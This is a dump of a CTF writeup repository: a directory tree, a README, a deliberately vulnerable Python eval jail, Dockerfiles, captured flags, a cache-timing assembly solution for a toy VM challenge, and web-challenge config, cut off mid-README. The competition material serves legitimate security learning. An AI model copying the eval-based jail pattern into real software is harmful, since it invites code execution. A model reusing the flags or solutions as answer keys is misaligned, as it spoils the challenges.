├── .gitignore ├── README.md ├── angstromctf23 └── misc │ └── obligatory │ └── writeup │ ├── README.md │ └── src │ ├── Dockerfile │ ├── flag.txt │ └── jail.py ├── b01lers22 ├── README.md ├── pwn │ └── veryfastvm │ │ ├── README.md │ │ ├── cpu.orig.py │ │ ├── cpu.py │ │ ├── flag.txt │ │ ├── pseudo-code.c │ │ ├── solution.asm │ │ ├── solution.min.asm │ │ └── solution.too-many.asm └── web │ └── hackerplace │ ├── README.md │ ├── hackerplace-src │ ├── Dockerfile_bot │ ├── Dockerfile_web │ ├── app.js │ ├── bot.js │ ├── canvas │ │ └── canvas │ ├── docker-compose.yml │ ├── flag.txt │ ├── package.json │ ├── pixel.png │ ├── static │ │ ├── css │ │ │ └── style.css │ │ └── js │ │ │ └── index.js │ └── templates │ │ └── index.ejs │ └── writeup-resources │ ├── callback-success.png │ ├── index.png │ ├── jwt.png │ ├── to-server-mal.png │ └── to-server-reg.png ├── csaw22-finals └── misc │ ├── embryo-leak │ ├── README.md │ ├── resources │ │ ├── help.png │ │ └── less.png │ ├── src-private │ │ ├── flag │ │ └── service.py │ └── src-public │ │ └── service.py │ └── super-guesser-game │ ├── README.md │ ├── resources │ └── run.png │ ├── service.py │ └── src │ ├── flag.txt │ └── service.py ├── csaw22-quals └── pwn │ └── how2pwn │ ├── README.md │ ├── challenge1 │ ├── README.md │ └── solution1.py │ ├── challenge2 │ ├── README.md │ └── solution2.py │ ├── challenge3 │ ├── README.md │ └── solution3.py │ ├── challenge4 │ ├── Makefile │ ├── README.md │ ├── myebpf-thin.c │ ├── myebpf.c │ └── solution4.py │ ├── public │ ├── Dockerfile │ ├── README.md │ ├── bin │ │ ├── all │ │ │ ├── chal1 │ │ │ ├── chal2 │ │ │ ├── chal3 │ │ │ └── chal4 │ │ ├── chal │ │ ├── exp.py │ │ ├── flag │ │ ├── logo │ │ └── start.sh │ ├── ctf.xinetd │ ├── docker-compose.yml │ ├── src │ │ ├── chal1.c │ │ ├── chal2.c │ │ ├── chal3.c │ │ └── chal4.c │ └── start.sh │ └── writeup-resources │ ├── chal2-after.png │ ├── chal2-after2.png │ ├── chal2-before.png │ ├── chal2-before2.png │ └── chal2-ss-call-rdx.png ├── diceCTF23 ├── misc │ └── 
mlog │ │ ├── README.md │ │ ├── resources │ │ ├── chatgpt-output.png │ │ ├── chatgpt-prompt.png │ │ ├── flag.png │ │ ├── playground-flag.png │ │ ├── prompt.png │ │ └── sample-input.png │ │ └── src │ │ └── mlog.tar.gz ├── pwn │ └── dice-visor │ │ ├── README.md │ │ ├── solution │ │ ├── build.sh │ │ ├── gen-shellcode.py │ │ ├── ghidra-kvm.h │ │ ├── init │ │ ├── initramfs_patched.cpio.gz │ │ └── main.c │ │ └── src │ │ ├── bzImage │ │ ├── dicer-visor │ │ └── initramfs.cpio.gz └── rev │ ├── not-baby-parallelism │ ├── README.md │ ├── solution.py │ └── src │ │ ├── flag.out │ │ └── pppp │ ├── parallelism │ ├── README.md │ ├── resources │ │ ├── gdb.png │ │ ├── memcmp.png │ │ ├── ready-to-attach.png │ │ └── run.png │ └── src │ │ └── parallelism │ └── time-travel │ ├── README.md │ ├── solution.py │ └── src │ ├── input.bin │ └── time_travel ├── googleCTF22 ├── misc │ ├── Segfault-Labyrinth │ │ ├── README.md │ │ ├── resources │ │ │ └── 52dfc0e5d7ec9438e47b7ca7e721b87bb14a86d55e2970fdec94cd4ddac4d6fbd129f16780feaf6dc756b79319712cc980a60e52749b4b691bc9f9769831d697.zip │ │ └── src │ │ │ ├── challenge │ │ │ ├── flag.txt │ │ │ ├── gdbscript │ │ │ ├── main.c │ │ │ ├── seg-faulting-labs.h │ │ │ ├── shellcode.c │ │ │ ├── solution.py │ │ │ └── test │ │ │ ├── Makefile │ │ │ └── test.c │ └── appnote │ │ ├── README.md │ │ ├── resources │ │ ├── 2551253642bde3066e55c9cc8e9b0b4aa77feadc00c81032da778e6f7c89907135dfc2611fd8617204720dbfadb31429ae11f6ecd202887f4ce99f2f53a3c5e8.zip │ │ ├── detailed-offsets.png │ │ └── overview.png │ │ └── src │ │ ├── dump.zip │ │ └── solution.py └── sandbox │ └── treebox │ ├── README.md │ ├── resources │ └── 17f98f8c9c9f8089ab3a35e94de752582253c3784637fe6ef6a561c12b817fcd7acf05a4573bff2cd43247f8e5263200aa29745605ae2719de774160bb21e301.zip │ └── src │ ├── .python-version │ ├── Dockerfile │ ├── flag │ └── treebox.py ├── hack-a-sat-23 └── pwn │ ├── RISC-V-Smash-Baby │ ├── README.md │ ├── resources │ │ ├── gdb-multiarch.png │ │ ├── pwntools-gdb.png │ │ ├── 
riscv-datatypes.png │ │ └── riscv-registers.png │ └── src │ │ ├── minimal-template.py │ │ ├── qemu-riscv │ │ ├── qemu-riscv-static │ │ ├── smash-baby │ │ └── solution.py │ └── dROP-Baby │ ├── README.md │ └── src │ ├── drop-baby │ ├── gadgets-func-calls.log │ ├── gadgets.log │ ├── hidden │ └── server.ini │ ├── qemu-riscv │ ├── qemu-riscv-static │ ├── server.ini │ ├── solution-cheesy.py │ └── solution.py ├── insomnihack2022 ├── PimpMyVariant │ ├── README.md │ └── resources │ │ └── home.png └── herald │ ├── Herald-e3081153dbcbc3f2bcd6aa0453e8ec6f7055deaf5762aee0a794e28e58b8bb12.apk │ ├── README.md │ └── resources │ ├── app-flag.png │ └── app-running.png ├── insomnihack2024 └── CryptoNotes │ ├── README.md │ ├── resources │ └── app-a91690d6479014d533bea108755aba2424b45b4b416823ed0c821ae421f820eb.apk │ └── solution │ ├── MaliciousApp │ ├── .gitignore │ ├── CMakeLists.txt │ ├── app │ │ ├── .gitignore │ │ ├── build.gradle │ │ ├── proguard-rules.pro │ │ └── src │ │ │ └── main │ │ │ ├── AndroidManifest.xml │ │ │ ├── cpp │ │ │ ├── main.cpp │ │ │ └── mylogger.h │ │ │ ├── java │ │ │ └── com │ │ │ │ ├── example │ │ │ │ └── insomnipwn │ │ │ │ │ └── MainActivity.kt │ │ │ │ └── inso │ │ │ │ └── ins24 │ │ │ │ └── utils │ │ │ │ ├── CryptoConfig.java │ │ │ │ └── JSONBuilder.java │ │ │ └── res │ │ │ ├── drawable-v24 │ │ │ └── ic_launcher_foreground.xml │ │ │ ├── drawable │ │ │ └── ic_launcher_background.xml │ │ │ ├── layout │ │ │ └── activity_main.xml │ │ │ ├── mipmap-anydpi-v26 │ │ │ ├── ic_launcher.xml │ │ │ └── ic_launcher_round.xml │ │ │ ├── mipmap-hdpi │ │ │ ├── ic_launcher.webp │ │ │ └── ic_launcher_round.webp │ │ │ ├── mipmap-mdpi │ │ │ ├── ic_launcher.webp │ │ │ └── ic_launcher_round.webp │ │ │ ├── mipmap-xhdpi │ │ │ ├── ic_launcher.webp │ │ │ └── ic_launcher_round.webp │ │ │ ├── mipmap-xxhdpi │ │ │ ├── ic_launcher.webp │ │ │ └── ic_launcher_round.webp │ │ │ ├── mipmap-xxxhdpi │ │ │ ├── ic_launcher.webp │ │ │ └── ic_launcher_round.webp │ │ │ ├── values-night │ │ │ └── 
themes.xml │ │ │ ├── values │ │ │ ├── colors.xml │ │ │ ├── strings.xml │ │ │ └── themes.xml │ │ │ └── xml │ │ │ ├── backup_rules.xml │ │ │ └── data_extraction_rules.xml │ ├── build.gradle │ ├── gradle.properties │ ├── gradle │ │ └── wrapper │ │ │ ├── gradle-wrapper.jar │ │ │ └── gradle-wrapper.properties │ ├── gradlew │ ├── gradlew.bat │ └── settings.gradle │ ├── init.gdbscript │ └── main.js ├── justCTF22 └── pwn │ └── arm │ ├── Armv8-A-AArch64-Cheatsheet.png │ ├── README.md │ ├── arm32-bit-cheatsheetv1.3.png │ ├── cli │ ├── cli_minimal_aarch64 │ ├── Dockerfile │ ├── cli │ ├── flag.txt │ └── run.sh │ ├── cli_minimal_native │ ├── Dockerfile │ ├── cli │ ├── flag.txt │ └── run.sh │ ├── resources │ ├── cmd-prompt.png │ └── login-prompt.png │ └── solution.py ├── lakeCTF23 └── pwn │ └── trustMEE │ ├── README.md │ ├── resources │ ├── Dockerfile │ ├── exploit_template.py │ ├── flag.txt │ ├── grade_ca.c │ ├── grade_ca.h │ ├── grade_ta.so │ ├── opentee.conf │ └── run.sh │ └── solution │ ├── Dockerfile │ ├── Makefile │ ├── grade_ca.c │ ├── grade_ca.h │ ├── load_grade_ca.c │ ├── mmap-demo │ └── main.c │ ├── opentee-helper.h │ ├── reload-forcefully-ta.sh │ ├── run-client.sh │ ├── run-gdb.sh │ └── script.gdb ├── m0lecon22 ├── dumbforum │ ├── README.md │ ├── dumbforum-src │ │ ├── Dockerfile │ │ ├── app │ │ │ ├── __init__.py │ │ │ ├── errors.py │ │ │ ├── forms.py │ │ │ ├── models.py │ │ │ ├── routes.py │ │ │ ├── static │ │ │ │ └── style.css │ │ │ └── templates │ │ │ │ ├── 404.html │ │ │ │ ├── 409.html │ │ │ │ ├── 500.html │ │ │ │ ├── base.html │ │ │ │ ├── edit_profile.html │ │ │ │ ├── forums.html │ │ │ │ ├── index.html │ │ │ │ ├── login.html │ │ │ │ ├── post.html │ │ │ │ ├── profile.html │ │ │ │ └── register.html │ │ ├── config.py │ │ ├── db │ │ │ └── app.db │ │ ├── docker-compose.yml │ │ ├── main.py │ │ └── requirements.txt │ ├── jinja2-dumper.py │ ├── jinja2.TemplateReference.dump │ └── writeup-resources │ │ ├── detour-xss.png │ │ ├── flag.png │ │ ├── index.png │ │ ├── 
invalid-email.png │ │ └── register-malicious.png └── fancynotes │ ├── README.md │ ├── fancynotes-src │ ├── Dockerfile │ ├── app │ │ ├── __init__.py │ │ ├── db.py │ │ ├── models.py │ │ ├── routes.py │ │ ├── static │ │ │ └── chao.gif │ │ ├── templates │ │ │ ├── base.html │ │ │ ├── index.html │ │ │ ├── login.html │ │ │ ├── notes.html │ │ │ └── registration.html │ │ ├── utils.py │ │ └── validators.py │ ├── docker-compose.yml │ └── requirements.txt │ ├── solution.py │ └── writeup-resources │ ├── create-note.png │ ├── index.png │ ├── login.png │ └── notes.png ├── midnight-quals-23 ├── pwn │ └── scaas │ │ ├── README.md │ │ ├── resources │ │ ├── sample-run.png │ │ └── solution-txt.png │ │ ├── scaas.c │ │ ├── solution.py │ │ ├── solver.py │ │ └── src │ │ └── scaas └── rev │ └── oss │ ├── README.md │ ├── resources │ ├── xref-puts-O0.png │ └── xref-puts-O2.png │ ├── solution │ ├── Makefile │ ├── lift.py │ ├── oss.angr.c │ └── solution.py │ └── src │ └── oss.c ├── midnight-quals-24 └── pwn │ └── roborop │ ├── Makefile │ ├── README.md │ ├── brutter.sh │ ├── dummy.c │ ├── dummy.gdbscript │ ├── resources │ └── roborop.tar.gz │ └── solution.py ├── pwnable.tw └── 3x17 │ ├── 3x17 │ ├── 3x17-ghidra.gpr │ ├── 3x17-ghidra.rep │ ├── idata │ │ ├── 00 │ │ │ ├── 00000000.prp │ │ │ └── ~00000000.db │ │ │ │ └── db.13.gbf │ │ ├── ~index.bak │ │ └── ~index.dat │ ├── project.prp │ ├── projectState │ ├── user │ │ └── ~index.dat │ └── versioned │ │ ├── ~index.bak │ │ └── ~index.dat │ └── expoit.py ├── sekaictf24 └── hijacker │ ├── README.md │ ├── resources │ └── secure_app.apk │ └── solution │ ├── .gitignore │ ├── app │ ├── .gitignore │ ├── build.gradle.kts │ ├── proguard-rules.pro │ └── src │ │ └── main │ │ ├── AndroidManifest.xml │ │ ├── java │ │ └── zero │ │ │ └── tolerance │ │ │ └── sekaidemo │ │ │ ├── MainActivity.kt │ │ │ └── OverlayService.kt │ │ └── res │ │ ├── drawable │ │ ├── ic_launcher_background.xml │ │ └── ic_launcher_foreground.xml │ │ ├── layout │ │ ├── activity_login.xml │ │ ├── 
activity_main.xml │ │ └── overlay_view.xml │ │ ├── mipmap-anydpi │ │ ├── ic_launcher.xml │ │ └── ic_launcher_round.xml │ │ ├── mipmap-hdpi │ │ ├── ic_launcher.webp │ │ └── ic_launcher_round.webp │ │ ├── mipmap-mdpi │ │ ├── ic_launcher.webp │ │ └── ic_launcher_round.webp │ │ ├── mipmap-xhdpi │ │ ├── ic_launcher.webp │ │ └── ic_launcher_round.webp │ │ ├── mipmap-xxhdpi │ │ ├── ic_launcher.webp │ │ └── ic_launcher_round.webp │ │ ├── mipmap-xxxhdpi │ │ ├── ic_launcher.webp │ │ └── ic_launcher_round.webp │ │ ├── values-night │ │ └── themes.xml │ │ ├── values │ │ ├── colors.xml │ │ ├── strings.xml │ │ └── themes.xml │ │ └── xml │ │ ├── backup_rules.xml │ │ └── data_extraction_rules.xml │ ├── build.gradle.kts │ ├── gradle.properties │ ├── gradle │ ├── libs.versions.toml │ └── wrapper │ │ ├── gradle-wrapper.jar │ │ └── gradle-wrapper.properties │ ├── gradlew │ ├── gradlew.bat │ └── settings.gradle.kts ├── statistics.sh ├── trx25 ├── pwn │ └── virtual_insanity │ │ ├── README.md │ │ ├── resources │ │ └── dist.zip │ │ └── solution.py └── pyjail │ └── golf │ ├── README.md │ └── resources │ └── challenge-misc-golf.zip ├── uiuctf2020 ├── .gitignore ├── README.md ├── kernel-exploitation │ ├── Getting_Started.pdf │ ├── Syscalls.pdf │ ├── freaky-file-descriptors │ │ └── README.md │ ├── how-to-get-started │ │ └── writeup.md │ ├── kernel-memory-leak │ │ ├── README.md │ │ ├── dollar-not-working.png │ │ ├── exploit-proof.png │ │ ├── hello-world.png │ │ ├── kernel-panic.png │ │ ├── part1-too-much.png │ │ ├── part2.png │ │ ├── part3.png │ │ ├── rash-splash-screen.png │ │ └── workaround.png │ ├── kernel-time-to-start │ │ ├── README.md │ │ ├── correct-1-char.gif │ │ ├── correct-2-chars.gif │ │ ├── dual.gif │ │ ├── invalid-1-char.gif │ │ ├── login-screen.png │ │ └── login-success.png │ └── whats-a-syscall │ │ ├── README.md │ │ ├── code1.png │ │ ├── screen1.png │ │ ├── screen2.png │ │ └── success.png └── pwn │ └── accounting-accidents │ ├── README.md │ ├── solution │ ├── accounting │ ├── 
auxiliary.c │ ├── auxiliary.so │ ├── checksec.json │ ├── gdb-script.gdb │ ├── ghidra │ │ ├── accounting.gpr │ │ └── accounting.rep │ │ │ ├── idata │ │ │ ├── 00 │ │ │ │ ├── 00000000.prp │ │ │ │ └── ~00000000.db │ │ │ │ │ └── db.14.gbf │ │ │ ├── ~index.bak │ │ │ └── ~index.dat │ │ │ ├── project.prp │ │ │ ├── projectState │ │ │ ├── user │ │ │ └── ~index.dat │ │ │ └── versioned │ │ │ ├── ~index.bak │ │ │ └── ~index.dat │ ├── node.h │ └── solution.py │ ├── ss-output.png │ └── ss-solution.png ├── uiuctf22 ├── jail │ ├── a-horse-with-no-names │ │ ├── README.md │ │ ├── desert.modified.py │ │ ├── generator.py │ │ ├── resources │ │ │ ├── Dockerfile │ │ │ ├── desert.py │ │ │ └── success.png │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── desert.py │ │ │ └── flag.txt │ ├── a-horse-with-no-neighs │ │ ├── README.md │ │ ├── desert.modified.py │ │ ├── generator.py │ │ ├── resources │ │ │ └── mapping.png │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── desert.py │ │ │ └── flag.txt │ └── safepy │ │ ├── README.md │ │ ├── resources │ │ └── handout.tar.gz │ │ └── src │ │ ├── Dockerfile │ │ ├── flag │ │ ├── main.py │ │ ├── nsjail.cfg │ │ └── run.sh └── pwn │ ├── no-syscalls-allowed │ ├── README.md │ ├── flag.txt │ ├── no_syscalls_allowed │ ├── no_syscalls_allowed.modified.c │ ├── resources │ │ ├── r13.png │ │ └── vmm.png │ ├── solution.py │ └── src │ │ └── no_syscalls_allowed.c │ └── odd-shell │ ├── README.md │ ├── flag │ ├── resources │ ├── after.png │ ├── before.png │ └── registers.png │ ├── solution.py │ └── src │ ├── Dockerfile │ ├── chal │ └── nsjail.cfg ├── uiuctf23 ├── pwn │ ├── chainmail │ │ ├── README.md │ │ ├── resources │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ └── flag.txt │ │ └── solution.py │ ├── virophage │ │ ├── README.md │ │ ├── resources │ │ │ ├── flag.png │ │ │ └── handout.tar.gz │ │ └── solution │ │ │ ├── 32-bitheader │ │ │ ├── shellcode-generator.py │ │ │ └── solve.sh │ └── zapping-a-suid1 │ │ ├── README.md │ │ ├── resources │ │ └── handout.tar.gz │ │ └── 
solution │ │ ├── Makefile │ │ ├── exploit.c │ │ ├── shellcode-execve.S │ │ ├── shellcode-flag.S │ │ └── solve.sh └── pyjail │ └── rattler-read │ └── writeup │ ├── README.md │ ├── resources │ ├── handout.tar.gz │ ├── neat-trick.png │ ├── pop-a-shell.png │ ├── random-interactive.png │ ├── random-module.png │ ├── scoping.png │ └── solve.png │ └── solution.py └── umass22 ├── README.md ├── baby-vm ├── .gitignore ├── README.md ├── babyvm ├── gdbpy-script.py └── rwx-dump ├── umassdining ├── Dockerfile ├── README.md ├── run.sh └── src │ ├── bot │ └── bot.py │ ├── main.py │ ├── static │ ├── images │ │ ├── 1984.jpg │ │ └── howmuchyoushouldeatumassdining.jpg │ ├── js │ │ └── thing.js │ └── styles │ │ └── bootstrap.min.css │ └── templates │ ├── essay_checker.html │ ├── index.html │ └── register.html └── venting ├── README.md ├── solution.py └── writeup-resources ├── admin-page.png ├── index.png ├── inthevents.png └── requests.png /.gitignore: -------------------------------------------------------------------------------- 1 | .vscode/ 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CTF writeups 2 | 3 | A place where I post CTF writeups and solutions for challenges that I have solved. 
4 | 5 | ## Repo statistics 6 | 7 | This repository contains the following number of writeups per category: 8 | 9 | | | | 10 | |----|----| 11 | | crypto | 1 | 12 | | hypervisor-pwn | 1 | 13 | | misc | 2 | 14 | | pwn | 18 | 15 | | pyjail | 9 | 16 | | rev | 6 | 17 | | Android | 2 | 18 | | web | 5 | 19 | -------------------------------------------------------------------------------- /angstromctf23/misc/obligatory/writeup/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM pwn.red/jail 2 | 3 | COPY --from=python:3.10-slim-bullseye / /srv 4 | COPY jail.py /srv/app/run 5 | COPY flag.txt /srv/app/flag.txt 6 | 7 | RUN mv /srv/app/flag.txt /srv/app/flag-$(head -c16 /dev/urandom | od -tx1 -An | tr -d ' ').txt 8 | RUN chmod 755 /srv/app/run 9 | 10 | ENV JAIL_MEM=20M 11 | -------------------------------------------------------------------------------- /angstromctf23/misc/obligatory/writeup/src/flag.txt: -------------------------------------------------------------------------------- 1 | actf{c0uln7_g3t_1t_7o_w0rk_0n_python39_s4dge} 2 | -------------------------------------------------------------------------------- /angstromctf23/misc/obligatory/writeup/src/jail.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | cod = input("sned cod: ") 3 | 4 | if any(x not in "q(jw=_alsynxodtg)feum'zk:hivbcpr" for x in cod): 5 | print("bad cod") 6 | else: 7 | try: 8 | print(eval(cod, {"__builtins__": {"__import__": __import__}})) 9 | except Exception as e: 10 | print("oop", e) 11 | -------------------------------------------------------------------------------- /b01lers22/README.md: -------------------------------------------------------------------------------- 1 | # b01lersCTF 2022 2 | 3 | > b01lers CTF is the public competitive CTF hosted by the Purdue Capture The Flag team. 4 | > 5 | > Registration will open approximately 2 weeks prior to the event. 
Join our discord at discord.gg/tBMqujE and stay posted for further info at https://ctf.b01lers.com 6 | > 7 | > Happy hacking! 8 | > 9 | > Prizes: Unfortunately, due to some administrative issues there are no explicit prizes for standings this year. 10 | > 11 | 12 | Our team [VUbar](https://ctftime.org/team/1353/) came in 31st place. 13 | 14 | Challenges are [publicly available](https://github.com/b01lers/b01lers-ctf-2022). 15 | -------------------------------------------------------------------------------- /b01lers22/pwn/veryfastvm/flag.txt: -------------------------------------------------------------------------------- 1 | bctf{c4ching_is_v3ry_goodo} -------------------------------------------------------------------------------- /b01lers22/pwn/veryfastvm/solution.asm: -------------------------------------------------------------------------------- 1 | 2 | # Solution with no comments to satisfy 2000 characters limitation 3 | movfrom r0 0000000 r1 4 | jmpz 21 5 | movc r1 4 6 | movc r6 32 7 | movc r8 1 8 | movc r9 2 9 | mov r2 r1 10 | mul r2 r6 11 | movfrom r3 1048575 r1 12 | movc r4 0x00000001 13 | mov r0 r4 14 | and r0 r3 15 | jmpz 2 16 | movfrom r0 0000000 r2 17 | mul r4 r9 18 | add r2 r8 19 | mov r0 r4 20 | jmpg r7 -7 21 | sub r1 r8 22 | mov r0 r1 23 | jmpg r7 -15 24 | 25 | reset 26 | 27 | movc r1 5 28 | movc r6 32 29 | movc r8 1 30 | movc r9 2 31 | mov r2 r1 32 | mul r2 r6 33 | sub r2 r8 34 | movc r3 0 35 | movc r4 32 36 | time 37 | mov r5 r0 38 | movfrom r0 0000000 r2 39 | time 40 | sub r0 r5 41 | sub r0 r8 42 | sub r0 r9 43 | xor r0 r8 44 | mul r3 r9 45 | or r3 r0 46 | sub r2 r8 47 | sub r4 r8 48 | mov r0 r4 49 | jmpg r7 -13 50 | movto r3 1000000 r1 51 | sub r1 r8 52 | mov r0 r1 53 | jmpg r8 -22 54 | movfrom r0 1000002 r7 55 | movfrom r1 1000003 r7 56 | movfrom r2 1000004 r7 57 | movfrom r3 1000005 r7 58 | magic 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- 
/b01lers22/web/hackerplace/hackerplace-src/Dockerfile_bot: -------------------------------------------------------------------------------- 1 | FROM node:alpine 2 | 3 | WORKDIR /app 4 | COPY package.json . 5 | RUN npm install 6 | COPY . . 7 | 8 | CMD ["node", "bot.js"] 9 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/Dockerfile_web: -------------------------------------------------------------------------------- 1 | FROM node:alpine 2 | 3 | WORKDIR /app 4 | COPY package.json . 5 | RUN npm install 6 | COPY . . 7 | 8 | CMD ["node", "app.js"] 9 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | place: 3 | build: 4 | dockerfile: ./Dockerfile_web 5 | context: . 6 | ports: 7 | - "8000:3000" 8 | volumes: 9 | - ./canvas:/app/canvas 10 | bot: 11 | build: 12 | dockerfile: ./Dockerfile_bot 13 | context: . 
14 | restart: always 15 | 16 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/flag.txt: -------------------------------------------------------------------------------- 1 | bctf{pl4y_n1ce_w1th_th3_0ther_h4ck3rz_d34r} -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "axios": "^0.26.1", 4 | "cookie-parser": "^1.4.6", 5 | "ejs": "^3.1.7", 6 | "express": "^4.17.3", 7 | "express-ws": "^5.0.2", 8 | "jsonwebtoken": "^8.5.1", 9 | "pngjs": "^6.0.0", 10 | "ws": "^8.5.0" 11 | }, 12 | "name": "hackerplace", 13 | "version": "1.0.0", 14 | "main": "app.js", 15 | "scripts": { 16 | "test": "echo \"Error: no test specified\" && exit 1" 17 | }, 18 | "keywords": [], 19 | "author": "", 20 | "license": "ISC", 21 | "description": "" 22 | } 23 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/pixel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/b01lers22/web/hackerplace/hackerplace-src/pixel.png -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/static/css/style.css: -------------------------------------------------------------------------------- 1 | html, body { 2 | min-height: 100%; 3 | height: 100%; 4 | margin: 0; 5 | } 6 | 7 | html { 8 | box-sizing: border-box; 9 | } 10 | 11 | body { 12 | background-color: #555; 13 | display: flex; 14 | justify-content: center; 15 | align-items: center; 16 | overflow: hidden; 17 | } 18 | 19 | *, *::before, *::after { 20 | box-sizing: inherit; 21 | } 22 | 23 | canvas { 24 | image-rendering: 
pixelated; 25 | } 26 | 27 | #palette { 28 | position: absolute; 29 | bottom: 16px; 30 | display: flex; 31 | padding: 16px; 32 | background-color: #ccc; 33 | } 34 | 35 | .color { 36 | width: 40px; 37 | height: 40px; 38 | border: 2px solid black; 39 | margin: 0 4px; 40 | cursor: pointer; 41 | } 42 | 43 | .color.selected { 44 | border: 2px solid green; 45 | } 46 | 47 | #cooldown { 48 | background-color: white; 49 | padding: 12px; 50 | color: black; 51 | position: fixed; 52 | top: 20px; 53 | width: fit-content; 54 | margin: 0 auto; 55 | } 56 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/templates/index.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | hacker/place 8 | 9 | 10 | 11 | 12 |
13 | <% for (let i = 0; i < palette.length; i++) { %> 14 | 15 | <% } %> 16 |
17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/writeup-resources/callback-success.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/b01lers22/web/hackerplace/writeup-resources/callback-success.png -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/writeup-resources/index.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/b01lers22/web/hackerplace/writeup-resources/index.png -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/writeup-resources/jwt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/b01lers22/web/hackerplace/writeup-resources/jwt.png -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/writeup-resources/to-server-mal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/b01lers22/web/hackerplace/writeup-resources/to-server-mal.png -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/writeup-resources/to-server-reg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/b01lers22/web/hackerplace/writeup-resources/to-server-reg.png 
-------------------------------------------------------------------------------- /csaw22-finals/misc/embryo-leak/resources/help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-finals/misc/embryo-leak/resources/help.png -------------------------------------------------------------------------------- /csaw22-finals/misc/embryo-leak/resources/less.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-finals/misc/embryo-leak/resources/less.png -------------------------------------------------------------------------------- /csaw22-finals/misc/embryo-leak/src-private/flag: -------------------------------------------------------------------------------- 1 | flag{y0U_f1NiSHeD_EmpR3Yo_lAeK_Ch@L1EnGe_aNd_uSE_hE1p_T0_Le@k_ThE_vAr_272763f8} -------------------------------------------------------------------------------- /csaw22-finals/misc/super-guesser-game/resources/run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-finals/misc/super-guesser-game/resources/run.png -------------------------------------------------------------------------------- /csaw22-finals/misc/super-guesser-game/src/flag.txt: -------------------------------------------------------------------------------- 1 | flag{c0ool_y0u_ArE_aN_SuPer_GuE33eR_M@n!} 2 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/challenge4/Makefile: -------------------------------------------------------------------------------- 1 | 2 | 3 | all: myebpf myebpf-thin 4 | 5 | myebpf: myebpf.c 6 | gcc -g -O0 myebpf.c -o myebpf 7 | 8 | myebpf-thin: 
myebpf-thin.c 9 | gcc -g -O0 myebpf-thin.c -o myebpf-thin 10 | 11 | clean: 12 | rm -rf myebpf myebpf-thin *.o 13 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 as ctf 2 | 3 | RUN apt-get update && \ 4 | apt-get install -y lib32z1 xinetd 5 | 6 | RUN useradd -m ctf 7 | 8 | WORKDIR /home/ctf 9 | 10 | RUN cp -R /lib* /home/ctf && \ 11 | mkdir /home/ctf/usr && \ 12 | cp -R /usr/lib* /home/ctf/usr 13 | 14 | 15 | RUN mkdir /home/ctf/dev && \ 16 | mknod /home/ctf/dev/null c 1 3 && \ 17 | mknod /home/ctf/dev/zero c 1 5 && \ 18 | mknod /home/ctf/dev/random c 1 8 && \ 19 | mknod /home/ctf/dev/urandom c 1 9 && \ 20 | chmod 666 /home/ctf/dev/* 21 | 22 | RUN mkdir /home/ctf/bin && \ 23 | cp /bin/sh /home/ctf/bin && \ 24 | cp /bin/ls /home/ctf/bin && \ 25 | cp /bin/cat /home/ctf/bin && \ 26 | cp /usr/bin/timeout /home/ctf/bin 27 | 28 | COPY ./start.sh /start.sh 29 | RUN echo "Blocked by ctf_xinetd" > /etc/banner_fail 30 | 31 | RUN chmod +x /start.sh 32 | 33 | 34 | CMD ["/start.sh"] 35 | 36 | EXPOSE 9999 37 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/README.md: -------------------------------------------------------------------------------- 1 | # Setup 2 | 3 | How to run the challenge locally: 4 | - `docker compose build` 5 | - `docker compose up` 6 | 7 | How to interact with the challenge locally: 8 | - `docker ps -a` to show all running containers 9 | - `docker exec -it public-ctf-1 bash` to interact with the container shell 10 | 11 | 12 | # Your Tasks 13 | 14 